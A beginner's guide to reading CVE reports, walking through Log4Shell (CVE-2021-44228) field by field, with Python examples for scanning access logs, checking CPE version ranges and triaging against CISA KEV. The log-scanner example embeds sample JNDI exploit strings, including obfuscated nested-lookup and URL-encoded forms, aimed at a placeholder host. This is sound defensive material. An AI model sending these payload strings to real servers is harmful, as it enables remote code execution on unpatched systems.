CVE 📅 Jul 3, 2026 ⏱ 8 min read 👶 Beginner friendly

How to Read a CVE Report: A Beginner's Guide

A security engineer sends you a Slack message: "CVE-2024-XXXXX just dropped, score 9.8 — are we affected?" Do you know how to find out? Reading a CVE report is a core IT skill. This guide walks you through every field, using the most famous CVE in recent history as a live example.

Where to find CVE reports

There are three primary sources:

Anatomy of a CVE report

Every NVD CVE page has the same structure. Here is what each section means:

CVE ID
The unique identifier. Format: CVE-YEAR-NUMBER, where NUMBER is a sequence number of at least four digits (longer numbers are allowed, e.g. CVE-2021-44228). The year is when the ID was reserved or the vulnerability was made public, not when it was discovered or fixed.
Description
A plain-English explanation of the vulnerability — what software is affected, what an attacker can do, and under what conditions. Read this carefully. Look for keywords: "remote code execution", "privilege escalation", "authentication bypass", "denial of service". These tell you what the attacker gains.
CVSS Score & Vector
The severity score (0–10) and the vector string that shows how it was calculated. Example: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Each component (AV=Attack Vector, AC=Complexity, PR=Privileges Required, etc.) tells you something specific about exploitability and impact.
CWE (Common Weakness Enumeration)
The category of weakness that caused the vulnerability. CWE-79 = XSS, CWE-89 = SQL Injection, CWE-502 = Deserialization of Untrusted Data. A CVE can carry more than one CWE: NVD tags Log4Shell with CWE-917 (expression language injection, covered in the walkthrough below) as well as CWE-502. Knowing the CWE helps you understand whether similar code patterns in your own software might have the same flaw.
Affected Configurations (CPE)
A list of the affected software versions, in Common Platform Enumeration format. Example: cpe:2.3:a:apache:log4j:2.0:*:*:*:*:*:*:* (the fields after the version are update, edition, language and so on; * means any). NVD writes ranges with bounds such as "from 2.0-beta9 up to (excluding) 2.15.0", and one CVE can list several ranges when the fix was backported to older release branches. This is how vulnerability scanners know which software to flag. Check the version range carefully: sometimes only specific versions within a range are vulnerable, and the patched versions sit just outside the bounds.
References
Links to vendor advisories, security researcher blog posts, proof-of-concept exploit code, and patch releases. Always follow the vendor advisory link for the definitive patch instructions. Check whether the references include "Exploit" — this confirms working exploit code is publicly available.
Known Exploited (CISA KEV)
A banner appears if this CVE is in the CISA Known Exploited Vulnerabilities catalog, meaning CISA has evidence it has been exploited in the wild (each entry also carries a remediation due date for US federal agencies). If you see this, patching becomes a drop-everything priority.

Full walkthrough: Log4Shell (CVE-2021-44228)

CVE ID

CVE-2021-44228 — assigned in 2021, disclosed publicly on 9 December 2021.

Description (simplified)

"Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled."

Translation: if your Java application uses Log4j 2 to write log messages, and an attacker can get any text they control into a log message (a username field, an HTTP header, anything), a crafted string such as a ${jndi:ldap://...} lookup makes your server fetch a Java class from a server the attacker controls and execute it. No authentication needed.
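
The description boils down to: any attacker-controlled text that reaches a log call is a trigger, so the same lookup syntax shows up in your own web logs when someone probes for it. The following is an added example (mine, not code from the article or from the Log4j project) that scans constructed web-server access log lines for ${jndi:...} lookups, including the URL-encoded and nested-lookup forms that were used to dodge naive string matching. The log lines, IP addresses and function names are constructed for the example; the normalisation handles only the lower/upper/default-value lookups, not every Log4j lookup type.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: no nested '${' or '}' inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Apply the handful of Log4j lookups attackers use to hide the word 'jndi'.
    Anything else (jndi itself, date, sys, ...) is left untouched."""
    if ":-" in token:                      # ${anything:-default} -> default, e.g. ${::-j} -> j
        return token.split(":-", 1)[1]
    low = token.lower()
    if low.startswith("lower:"):           # ${lower:J} -> j
        return token[6:].lower()
    if low.startswith("upper:"):           # ${upper:n} -> N
        return token[6:].upper()
    return "${" + token + "}"


def normalise_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse innermost lookups until nothing changes (bounded so a
    crafted payload cannot keep us looping)."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def has_jndi_lookup(field: str) -> bool:
    """True if the field carries a ${jndi:...} lookup, plain or obfuscated,
    after URL-decoding (%24%7B is '${')."""
    return bool(_JNDI.search(normalise_lookups(unquote(field))))


# Combined log format: remote ident user [time] "request" status size "referer" "user-agent"
_LOG = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "([^"]*)" \d+ \S+ "([^"]*)" "([^"]*)"$')


def scan_access_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, field name, normalised value) for every field carrying a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = _LOG.match(line)
        if not m:
            continue  # in production, count unparsable lines instead of silently dropping them
        fields = dict(zip(("remote", "user", "request", "referer", "user_agent"), m.groups()))
        for name, value in fields.items():
            if has_jndi_lookup(value):
                findings.append((n, name, normalise_lookups(unquote(value))))
    return findings


# Constructed sample lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "${${lower:j}${upper:n}${::-d}i:ldap://203.0.113.99/x}" "curl/7.79"',
    '203.0.113.13 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.99%2Fy%7D HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for line_no, field, payload in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: JNDI lookup in {field}: {payload}")
```

A hit only tells you someone tried; whether it worked depends on the answers to the version questions below, and the fix is still the upgrade, not the detector.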

CVSS Score

CRITICAL 10.0 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Reading the vector: Network attack (AV:N), Low complexity (AC:L), No privileges required (PR:N), No user interaction (UI:N), Changed scope (S:C — the attack affects systems beyond the vulnerable component), High confidentiality impact (C:H), High integrity impact (I:H), High availability impact (A:H). Maximum score across every dimension.

CWE

CWE-917 — Improper Neutralisation of Special Elements used in an Expression Language Statement. The logging library interpreted user-controlled input as code (a JNDI lookup expression) instead of treating it as plain text.

Affected configurations

Apache Log4j2 versions 2.0-beta9 through 2.14.1, excluding the backported security releases 2.12.2 (Java 7 branch) and 2.3.1 (Java 6 branch). Note: Log4j 1.x is NOT affected by this CVE (it has different vulnerabilities). 2.15.0 disabled message lookups by default but its fix was incomplete (tracked separately as CVE-2021-45046); 2.16.0 removed message lookups entirely, and 2.17.0 fixed a follow-on denial-of-service (CVE-2021-45105). On Java 8 and later, the version to be on is 2.17.0 or newer.
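
Answering "are we on a vulnerable version?" means comparing each installed version against the CVE's affected ranges, and version strings like 2.0-beta9 do not compare correctly as plain text. The following is an added example (mine, not code from the article or from NVD) that splits CPE 2.3 strings into fields, compares versions with pre-release tags in the right order, and checks a constructed inventory against the three ranges NVD's affected-configuration data lists for CVE-2021-44228 (take the bounds from the live record; they are reproduced here as an assumption). Host names, the inventory and the function names are constructed; the example keeps the beta tag in the version field for simplicity.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

CPE_FIELDS = ["part", "vendor", "product", "version", "update", "edition",
              "language", "sw_edition", "target_sw", "target_hw", "other"]


def parse_cpe23(cpe: str) -> Dict[str, str]:
    """Split a CPE 2.3 formatted string into named fields.
    A colon escaped as '\\:' inside a field is not a separator."""
    fields = re.split(r"(?<!\\):", cpe)
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    return dict(zip(CPE_FIELDS, fields[2:]))


_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:[-.]?(alpha|beta|rc)(\d*))?", re.IGNORECASE)
_PRE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}


def version_key(v: str) -> Tuple[int, ...]:
    """Sort key such that 2.0-beta9 < 2.0 < 2.0.1 < 2.14.1 < 2.15.0:
    a pre-release sorts before the final release of the same number."""
    m = _VERSION_RE.fullmatch(v)
    if not m:
        raise ValueError(f"cannot compare version {v!r}; check it by hand")
    nums = tuple(int(n) for n in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))          # pad so 2.4 compares as 2.4.0.0
    if m.group(2):
        pre = (0, _PRE_ORDER[m.group(2).lower()], int(m.group(3) or 0))
    else:
        pre = (1, 0, 0)                     # final release: after any pre-release
    return nums + pre


@dataclass(frozen=True)
class AffectedRange:
    vendor: str
    product: str
    start_including: Optional[str]   # None = no lower bound
    end_excluding: Optional[str]     # None = no upper bound


def in_range(version: str, r: AffectedRange) -> bool:
    v = version_key(version)
    if r.start_including and v < version_key(r.start_including):
        return False
    if r.end_excluding and v >= version_key(r.end_excluding):
        return False
    return True


def is_affected(installed_cpe: str, ranges: List[AffectedRange]) -> bool:
    c = parse_cpe23(installed_cpe)
    if c["version"] in ("*", "-"):
        raise ValueError(f"{installed_cpe!r} has no concrete version; the inventory must record one")
    return any((c["vendor"], c["product"]) == (r.vendor, r.product) and in_range(c["version"], r)
               for r in ranges)


def affected_hosts(inventory: Dict[str, List[str]], ranges: List[AffectedRange]) -> Dict[str, List[str]]:
    """host -> the CPEs on it that fall inside an affected range (clean hosts are omitted)."""
    result = {}
    for host, cpes in inventory.items():
        hits = [cpe for cpe in cpes if is_affected(cpe, ranges)]
        if hits:
            result[host] = hits
    return result


# Ranges as listed in NVD's configuration for CVE-2021-44228 (assumption: verify against the live record).
# Each upper bound is the first fixed release on that branch.
LOG4SHELL_RANGES = [
    AffectedRange("apache", "log4j", "2.0-beta9", "2.3.1"),
    AffectedRange("apache", "log4j", "2.4", "2.12.2"),
    AffectedRange("apache", "log4j", "2.13.0", "2.15.0"),
]

# Constructed inventory for the example (hypothetical hosts).
INVENTORY = {
    "web-01": ["cpe:2.3:a:apache:log4j:2.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.54:*:*:*:*:*:*:*"],
    "web-02": ["cpe:2.3:a:apache:log4j:2.17.0:*:*:*:*:*:*:*"],
    "legacy-01": ["cpe:2.3:a:apache:log4j:1.2.17:*:*:*:*:*:*:*"],
    "batch-01": ["cpe:2.3:a:apache:log4j:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0-beta9:*:*:*:*:*:*:*"],
}

if __name__ == "__main__":
    for host, cpes in affected_hosts(INVENTORY, LOG4SHELL_RANGES).items():
        print(host, "->", ", ".join(cpes))
```

Note what the ranges do and do not catch: 2.12.2 on batch-01 is a fixed security release and is correctly skipped, 1.2.17 on legacy-01 is out of scope for this CVE, and the 2.0-beta9 instance is flagged only because the comparison understands that a beta precedes the release it is named after.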

Key references

Lesson from Log4Shell

The hardest part of Log4Shell was not patching Log4j itself; it was finding all the places Log4j was used. Many organisations had no idea they had it because it was bundled inside other commercial products and as a transitive dependency of other Java libraries. This is why a software bill of materials (SBOM), a list of every library in your software, is now a compliance requirement in many industries.

Vendor advisories — why they matter

The NVD entry gives you the vulnerability; vendor advisories give you the fix. After finding a CVE that affects your software, always look up the vendor's specific advisory for:

The 5 questions to ask every time

When you read a CVE report, these five questions give you everything you need to make a decision:

  1. Do we run the affected software? Check your asset inventory against the CPE list. If no, you are done.
  2. Are we on a vulnerable version? Version ranges matter. 2.14.0 affected, 2.17.0 not. Check precisely.
  3. Is it reachable? Is the vulnerable service exposed to the internet, to internal users, or only to admins? Network exposure dramatically changes risk.
  4. Is there a patch? If yes, apply it. Check the vendor advisory for the specific patched version.
  5. Is it being actively exploited? Check the CISA KEV catalog. If yes, patch immediately — before anything else.
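
The five questions, wired together as an added example (mine, not code from the article or from CISA): a constructed excerpt in the shape of CISA's KEV JSON feed, a Finding record holding the answers to questions 1 to 4, and a triage function that answers question 5 by looking the CVE up in the feed and turns the whole checklist into a priority and an ordered patch queue. The priority names, SLA days, the second and third CVE IDs (placeholders in the article's own CVE-2024-XXXXX style) and the KEV entry's text and dates are assumptions for illustration; the feed field names (cveID, dueDate, ...) are the real ones.

```python
import json
from dataclasses import dataclass
from typing import Dict, List

# Constructed excerpt in the shape of CISA's KEV JSON feed. Field names match the feed;
# the entry's text and dates are illustrative, so check the live catalog for real values.
KEV_FEED_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {
            "cveID": "CVE-2021-44228",
            "vendorProject": "Apache",
            "product": "Log4j2",
            "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
            "dateAdded": "2021-12-10",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2021-12-24",
        }
    ],
})


def load_kev(feed_json: str) -> Dict[str, dict]:
    """Index the feed by CVE ID so question 5 becomes a dictionary lookup."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


@dataclass
class Finding:
    cve: str
    cvss: float
    runs_software: bool        # Q1: a CPE in the CVE's configuration matched our inventory
    vulnerable_version: bool   # Q2: the installed version is inside an affected range
    exposure: str              # Q3: "internet", "internal" or "admin_only"
    patch_available: bool      # Q4: the vendor advisory names a fixed version


# Assumed remediation targets in days per priority (not from the article or any standard).
SLA_DAYS = {"P0": 1, "P1": 7, "P2": 30, "P3": 90}


def triage(f: Finding, kev: Dict[str, dict]) -> dict:
    """Walk the five questions in order and return a priority and an action."""
    if not (f.runs_software and f.vulnerable_version):          # Q1 and Q2
        return {"cve": f.cve, "cvss": f.cvss, "priority": "none", "sla_days": None,
                "action": "not affected; record the check and close"}
    in_kev = f.cve in kev                                       # Q5 outranks everything else
    if in_kev or (f.cvss >= 9.0 and f.exposure == "internet"):
        priority = "P0"
    elif f.cvss >= 7.0 and f.exposure != "admin_only":          # Q3 shapes the rest
        priority = "P1"
    elif f.cvss >= 7.0 or f.exposure == "internet":
        priority = "P2"
    else:
        priority = "P3"
    action = "apply the vendor patch" if f.patch_available else "apply the vendor workaround and watch for a patch"  # Q4
    if in_kev:
        action += f" (in CISA KEV, federal due date {kev[f.cve]['dueDate']})"
    return {"cve": f.cve, "cvss": f.cvss, "priority": priority,
            "sla_days": SLA_DAYS[priority], "action": action}


def patch_queue(findings: List[Finding], kev: Dict[str, dict]) -> List[dict]:
    """Affected findings only, most urgent first: tightest SLA, then highest CVSS."""
    rows = [r for r in (triage(f, kev) for f in findings) if r["priority"] != "none"]
    return sorted(rows, key=lambda r: (r["sla_days"], -r["cvss"]))


# Constructed findings; the CVE-2024-XXXX* IDs are placeholders, not real records.
FINDINGS = [
    Finding("CVE-2021-44228", 10.0, True, True, "internet", True),
    Finding("CVE-2024-XXXX1", 7.5, True, True, "internal", True),
    Finding("CVE-2024-XXXX2", 9.1, True, False, "internet", True),   # patched version already installed
]

if __name__ == "__main__":
    for row in patch_queue(FINDINGS, load_kev(KEV_FEED_JSON)):
        print(f"{row['priority']} ({row['sla_days']}d) {row['cve']}: {row['action']}")
```

The point of the ordering is that a KEV entry sends a finding to the front of the queue regardless of its CVSS score, while a 9.1 on a host that already runs a fixed version never enters the queue at all.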

Tools that make CVE reading easier

Frequently asked questions

What does "RESERVED" mean on a CVE page?

RESERVED means the CVE ID has been allocated to a CVE Numbering Authority (CNA) but the record has not been published yet. This usually happens during the embargo period, when the vendor is working on a patch but has not disclosed the vulnerability publicly; the details appear when the CNA publishes the record, typically alongside the fix. Some IDs stay RESERVED indefinitely because they were never used or the issue was never made public.

Why do some CVEs have no CVSS score?

NVD analysts score CVEs after publication, so a newly published CVE can show "NVD analysis not yet performed" (status "Awaiting Analysis"). The score usually appears within days, but NVD has had long analysis backlogs, so do not wait for it: the CNA that published the record can supply its own CVSS score, which NVD shows alongside its own, and the vendor's advisory often includes one too.

Should I patch every CVE I find?

No — prioritise. Focus on Critical and High scores, especially those in the CISA KEV catalog. Medium and Low scores can go into your normal patch cycle. For systems that are isolated from the internet and from sensitive data, even high scores can sometimes wait for scheduled maintenance windows.

Keep learning on ITVedas

You now know how to find, read, and act on a CVE report. Explore the full CVE chapter for more guides on vulnerability management.
